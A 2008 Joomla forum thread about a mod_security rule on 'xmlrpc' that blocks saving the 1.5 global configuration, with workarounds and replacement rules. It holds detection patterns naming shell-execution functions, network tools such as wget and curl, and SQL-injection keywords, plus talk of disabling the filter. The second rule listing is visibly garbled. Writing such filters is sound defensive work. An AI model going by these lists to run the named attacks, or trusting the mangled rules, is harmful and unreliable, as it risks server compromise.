The Joomla! Forum ™

Download

Demo


Board index » Joomla! 1.5 - Ask Support Questions Here » General Questions/New to Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting.
Forum Post Assistant - If you are serious about wanting help, you should use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 26 posts ] 
  Print view Previous topic | Next topic 
Author Message
Strats
PostPosted: Tue Jan 22, 2008 12:06 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
Hi,

On a fresh 1.5 installation I cannot save the global configuration:

Not Acceptable
An appropriate representation of the requested resource /joomladir/administrator/index.php could not be found on this server.

I don't have any problem with JOOMLA 1.0.13 installations on the same server, it happens only at version 1.5.0 stable

Thanks
Top
 Profile  
 
GooRu
PostPosted: Sat Jan 26, 2008 10:07 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Mon May 08, 2006 7:39 pm
Posts: 280
Location: North Vancouver
I'm having the exact same issue. Joomla 1.5
Top
 Profile  
 
Strats
PostPosted: Sat Jan 26, 2008 10:15 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
The problem is caused if server is protected against "xmlrpc" bad requests. It is caused by mod_security and the following rule which UNFORTUNATELY has to be disabled in order for the joomla 1.5 configuration to be saved:

Code:
SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"


Of course by disabling the rule above, we open a security issue as it can be used to wget something to /tmp then execute a binary probably to root the server
Top
 Profile  
 
GooRu
PostPosted: Sun Jan 27, 2008 7:08 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Mon May 08, 2006 7:39 pm
Posts: 280
Location: North Vancouver
Starts..

Can you point to the file I need to access the code you found? I'd like to see if disabing this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.
Top
 Profile  
 
Strats
PostPosted: Sun Jan 27, 2008 7:13 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
GooRu wrote:
Starts..

Can you point to the file I need to access the code you found? I'd like to see if disabing this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.



You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/
(of course you musr have server root access):

#SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

I don't know if developers are aware of this issue

EDIT:
Problem is that inside configuration.php exists entry "$xmlrpc_server" which makes mod_security to see it as an attack.

Definitely a developer has to look into that cause I don't think that server admins are willing to disable security rule against "xmlrpc" attacks.


Last edited by Strats on Sun Jan 27, 2008 8:00 pm, edited 1 time in total.

Top
 Profile  
 
mcsmom
PostPosted: Sun Jan 27, 2008 8:09 pm 
User avatar
Joomla! Exemplar
Joomla! Exemplar
Offline

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 7687
Location: New York
You should disable it.

_________________
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.
Top
 Profile  
 
Robin
PostPosted: Sun Jan 27, 2008 8:10 pm 
User avatar
Joomla! Master
Joomla! Master
Offline

Joined: Thu Aug 18, 2005 10:41 am
Posts: 15729
Dev's are informed on this thread.

_________________
Regards Robin

http://www.linkedin.com/in/robinmuilwijk - http://twitter.com/i_robin
Top
 Profile  
 
PhilTaylor-Prazgod
PostPosted: Sun Jan 27, 2008 8:36 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
mcsmom wrote:
You should disable it.


THAT IS THE WORSE EVER ADVICE I HAVE EVER READ ON THESE FORUMS!!

Furthermore, not every Joomla user has root access to turn off mod_security or modify its rules.

While I appreciate that not every server will have mod_security installed, the latest rules that I would recommend (from gotroot.com) are quoted below and ensure all most active attacks against a site using xmlrpc are filtered.

Code:
#MTS
#XML-RPC generic attack sigs
SecRule REQUEST_HEADERS "^Content-Type\: application/xml" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" chain
SecRule REQUEST_BODY "methodCall\>"

#Specific XML-RPC attacks on xmlrpc.php
SecRule REQUEST_URI "(xmlrpc|xmlrpc.*)\.php" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#Too generic, unless you know you won't see this in any of the fields of an XMLRPC message on your system
#SecRule REQUEST_URI "/xmlrpc\.php" chain
#SecRule "(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

#XML-RPC SQL injection generic signature
SecRule REQUEST_URI "(xmlrpc|xmlrpc_.*)\.php" chain
SecRule REQUEST_BODY  "<methodName>.*</methodName>.*<value><string>.*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>"





Quote:
You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/


Not always the correct path - on cpanel boxes its different and depends on apache/mod_security version:
/etc/httpd/conf/modsec2.user.conf
/etc/httpd/conf/modsec.user.conf


I would recommend that you change (If you can - or suggest this forum post to your web hosting company) your single line

Quote:
SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"


With the rules quoted above - this will filter all most "seen" exploits in real life and also allow Joomla 1.5 to save (Actually it falls over on the REQUEST_BODY part)



AND IF YOU CANNOT GET YOUR mod_security settings changed:

Then you will need to rename every instance of xmlrpc_server in the Joomla 1.5 code - very easy to do with a PHP editor like Zend or Eclipse - just search and replace with something like "xserver" - there are only 22 occurrences in 12 files for the word: xmlrpc_server

I hope this is a more helpful post :-)

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/
Top
 Profile  
 
Strats
PostPosted: Sun Jan 27, 2008 8:42 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
Thanks a lot Phil, finally someone gave the proper attention!
Top
 Profile  
 
PhilTaylor-Prazgod
PostPosted: Sun Jan 27, 2008 8:50 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
Strats wrote:
Thanks a lot Phil, finally someone gave the proper attention!


Your'e welcome

Thinking this through - if you continue to use the rule you currently have you will never be able to use the xml-rpc plugin/features of Joomla 1.5 (Although I know of no component that actually uses this at the moment)

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/
Top
 Profile  
 
masterchief
PostPosted: Sun Jan 27, 2008 9:12 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Fri Aug 12, 2005 2:45 am
Posts: 1916
Location: Toowoomba, Australia
Phil, I don't know that some of those rules will work.

The path for the XML-RPC server is /xmlrpc/index.php, or just /xmlrpc/

Rules would also need to be aware of SEF url's like:

foobar.com/joomla/help/xmlrpc.html

There are also a couple of simple defenses:

a) Make sure the configuration setting for the XML-RPC server is "off" (xmlrpc_server = 0)
b) Make sure any XML-RPC plugins are disabled.
b) Delete the /xmlrpc/ folder altogether

So am I understanding correctly, the rule:

SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

says bounce the page if you find xmlrpc in the URI or in the body of the request?  If that's the case it's not a well crafted rule as it would disallow many valid pages.  For instance you wouldn't be able to write an article on using an XML-RPC server.

_________________
Andrew Eddie - Tweet @AndrewEddie
<><
http://learn.theartofjoomla.com - Joomla 1.6 training videos!
http://www.kiva.org/team/joomla - Got Joomla for free? Pay it forward and help fight poverty.
Top
 Profile  
 
PhilTaylor-Prazgod
PostPosted: Sun Jan 27, 2008 9:32 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
masterchief wrote:
Phil, I don't know that some of those rules will work.

The path for the XML-RPC server is /xmlrpc/index.php, or just /xmlrpc/

Rules would also need to be aware of SEF url's like:

foobar.com/joomla/help/xmlrpc.html

There are also a couple of simple defenses:

a) Make sure the configuration setting for the XML-RPC server is "off" (xmlrpc_server = 0)
b) Make sure any XML-RPC plugins are disabled.
b) Delete the /xmlrpc/ folder altogether

So am I understanding correctly, the rule:

SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

says bounce the page if you find xmlrpc in the URI or in the body of the request?  If that's the case it's not a well crafted rule as it would disallow many valid pages.  For instance you wouldn't be able to write an article on using an XML-RPC server.


Hi Andrew

The original post was about the saving of Joomla Global Configuration and not about preventing attacks by XMLRPC :-) I guess you scanned it like we all have to when we have loads to reply to.

The rules from gotroot.com are generic xmlrpc rules, they are not designed to stop all xmlrpc traffic, but are designed to stop [BAD] xmlrpc traffic

You are right that only the first rule would help with attacks directed at Joomla's specific xmlrpc system - the other three at the moment would not - but simply removing \.php in the last three would mean they get tested against Joomla xmlrpc urls.

So back to the original posters problem.  I agree that the rule that he has posted is a badly crafted rule - but from the sounds of it, it was forced upon him by a web hosting company.


Here are the actual rules that *should* work on the above( Left this to last as large quotes in forum posts are a pain)

Quote:
#MTS
#XML-RPC generic attack sigs
SecRule REQUEST_HEADERS "^Content-Type\: application/xml" chain
SecRule REQUEST_BODY "(\SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" chain
SecRule REQUEST_BODY "methodCall\>"

#Specific XML-RPC attacks
SecRule REQUEST_URI "xmlrpc" chain
SecRule REQUEST_BODY "(\SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#Too generic, unless you know what you are doing you won't see this in any of the fields of an XMLRPC message on your system
#SecRule REQUEST_URI "xmlrpc" chain
#SecRule "(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

#XML-RPC SQL injection generic signature
SecRule REQUEST_URI "xmlrpc" chain
SecRule REQUEST_BODY  ".*.*.*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>"

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/
Top
 Profile  
 
youngwilly
PostPosted: Thu Feb 21, 2008 8:07 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
can anyone post a reply in English please that we mere mortals can understand?

I have done a fresh install of 1.5 and as it stands it is unuseable as all attempts to save end up with this http 406 error, whether it is global config, new sections, or content. Back to 1.0 for me it seems.
Top
 Profile  
 
PhilTaylor-Prazgod
PostPosted: Thu Feb 21, 2008 9:26 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
youngwilly wrote:
can anyone post a reply in English please that we mere mortals can understand?

I have done a fresh install of 1.5 and as it stands it is unuseable as all attempts to save end up with this http 406 error, whether it is global config, new sections, or content. Back to 1.0 for me it seems.


In English: There is nothing you can do unless you are the server administrator or hosting company.

You could disable mod_security filtering by using a .htaccess override BUT I DO NOT RECOMMEND THAT

You could disable mod_security filtering by using a .htaccess override on the administrator folder ONLY - BUT I DO NOT RECOMMEND THAT - but that might be a quick temp fix for you.

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/
Top
 Profile  
 
brad
PostPosted: Thu Feb 21, 2008 9:28 pm 
User avatar
Joomla! Master
Joomla! Master
Offline

Joined: Fri Aug 12, 2005 12:38 am
Posts: 13163
Location: Sydney - Australia
Sometimes using certain strings in passwords can also cause mod_security to flag the post.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help
..somewhere in this hospital the anguished oink of a pig man cries out for help..
Top
 Profile  
 
mcsmom
PostPosted: Fri Feb 22, 2008 3:08 am 
User avatar
Joomla! Exemplar
Joomla! Exemplar
Offline

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 7687
Location: New York
Whoa, I never read this thread again, but I didn't mean disable mod_security, though that was certainly unclear. I think I posted right in the middle of dealing with the xmlrpc issue.

_________________
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.
Top
 Profile  
 
youngwilly
PostPosted: Fri Feb 22, 2008 2:23 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
Quote:
You could disable mod_security filtering by using a .htaccess override on the administrator folder ONLY - BUT I DO NOT RECOMMEND THAT - but that might be a quick temp fix for you.


OK how do I do this as a temporary measure? Can I do this, make my changes to Global Config, etc, then undo the temporary change?

thanks
Brian
Quote:
Top
 Profile  
 
youngwilly
PostPosted: Fri Feb 22, 2008 11:51 pm 
Joomla! Apprentice
Joomla! Apprentice
Offline

Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
Strats wrote:
GooRu wrote:
Starts..

Can you point to the file I need to access the code you found? I'd like to see if disabing this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.



You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/
(of course you musr have server root access):

#SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

I don't know if developers are aware of this issue

EDIT:
Problem is that inside configuration.php exists entry "$xmlrpc_server" which makes mod_security to see it as an attack.

Definitely a developer has to look into that cause I don't think that server admins are willing to disable security rule against "xmlrpc" attacks.


Can I edit out the "$xmlrpc_server" in configuration.php to prevent this?
Top
 Profile  
 
silexian
PostPosted: Thu Feb 28, 2008 9:27 am 
Joomla! Intern
Joomla! Intern
Offline

Joined: Fri Sep 02, 2005 9:24 pm
Posts: 53
Hello

May you provide the codes we should put on a .htaccess or a php.ini file ?
Because I've no access to Apache configuration files on my share hosting account.

regards
Top
 Profile  
 
Pintrem
PostPosted: Sat Mar 22, 2008 7:34 pm 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Fri Aug 18, 2006 6:07 pm
Posts: 2
Phil, thank you for your advise, however, I replaced all the instances of xmlrpc_server with xserver but still get the same message when trying to save the global configuration?

Since my server admin will not change the rules (and rightfully so) is the only option left to me, to go back to the old version of joomla? :eek:
Top
 Profile  
 
chris_m_smith
PostPosted: Fri Apr 04, 2008 7:07 pm 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Tue Jun 19, 2007 1:09 pm
Posts: 3
I understand the issue with this but If I am working around the 406 global config problem., I can easily edit the configuration.php but I can't find any var $ for useractivation etc.

Is there a way to manaully tweak any file to set the Allow User Registration flag to yes=1?

I saw eariler versions of the php-dist that had var $useractivation =1 but it dodn't seem to work on 1.5.1

Any Help would be fantastic
:geek:
Top
 Profile  
 
brad
PostPosted: Fri Apr 04, 2008 8:28 pm 
User avatar
Joomla! Master
Joomla! Master
Offline

Joined: Fri Aug 12, 2005 12:38 am
Posts: 13163
Location: Sydney - Australia
Simply edit your configuration.php file.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help
..somewhere in this hospital the anguished oink of a pig man cries out for help..
Top
 Profile  
 
techdavis
PostPosted: Mon Apr 21, 2008 11:37 pm 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Mon Apr 21, 2008 11:32 pm
Posts: 2
Gee, thanks for the words of wisdom, Brad, but saying "
brad wrote:
Simply edit your configuration.php file.
is less than useless help. Edit it to WHAT? Commenting out the xmlrpc_server line, changing it from '0' to '1', none of that made any difference. Please help with useful information - this is a pretty serious issue.

Thanks!
Top
 Profile  
 
PhilTaylor-Prazgod
PostPosted: Tue Apr 22, 2008 3:13 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
techdavis wrote:
Gee, thanks for the words of wisdom, Brad, but saying "
brad wrote:
Simply edit your configuration.php file.
is less than useless help. Edit it to WHAT? Commenting out the xmlrpc_server line, changing it from '0' to '1', none of that made any difference. Please help with useful information - this is a pretty serious issue.

Thanks!



I think he means, instead of using the GUI (Joomla Admin) to change the values of your global config - manually edit the content of the configuration.php file and change the values in there (and forget the fact that the Joomla Admin exists :-) )

Not easy for a beginner but this is a workaround for those with hosts that are very restrictive...

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/
Top
 Profile  
 
techdavis
PostPosted: Tue Apr 22, 2008 3:59 pm 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Mon Apr 21, 2008 11:32 pm
Posts: 2
Thanks Phil - that was the conclusion I came up with as well, after getting frustrated with the GUI errors. Hopefully this will be addressed by the developers soon. 8)
Top
 Profile  
 
sonik511
PostPosted: Sun Mar 15, 2009 5:23 am 
Joomla! Fledgling
Joomla! Fledgling
Offline

Joined: Thu Feb 19, 2009 5:29 pm
Posts: 1
I think all the solutions suggested are really complicated. There is a simple way out. directly go and update the table named jos_components (in some cases depending on your config the jos part can be named something else). Edit the row with id 31 column name "params". set it to
allowUserRegistration=1
new_usertype=Registered
useractivation=1
frontend_userparams=1


Hope this helps
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 26 posts ] 


Board index » Joomla! 1.5 - Ask Support Questions Here » General Questions/New to Joomla! 1.5

Who is online

Users browsing this forum: g1smd, MajikNinja, Orionet82 and 37 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group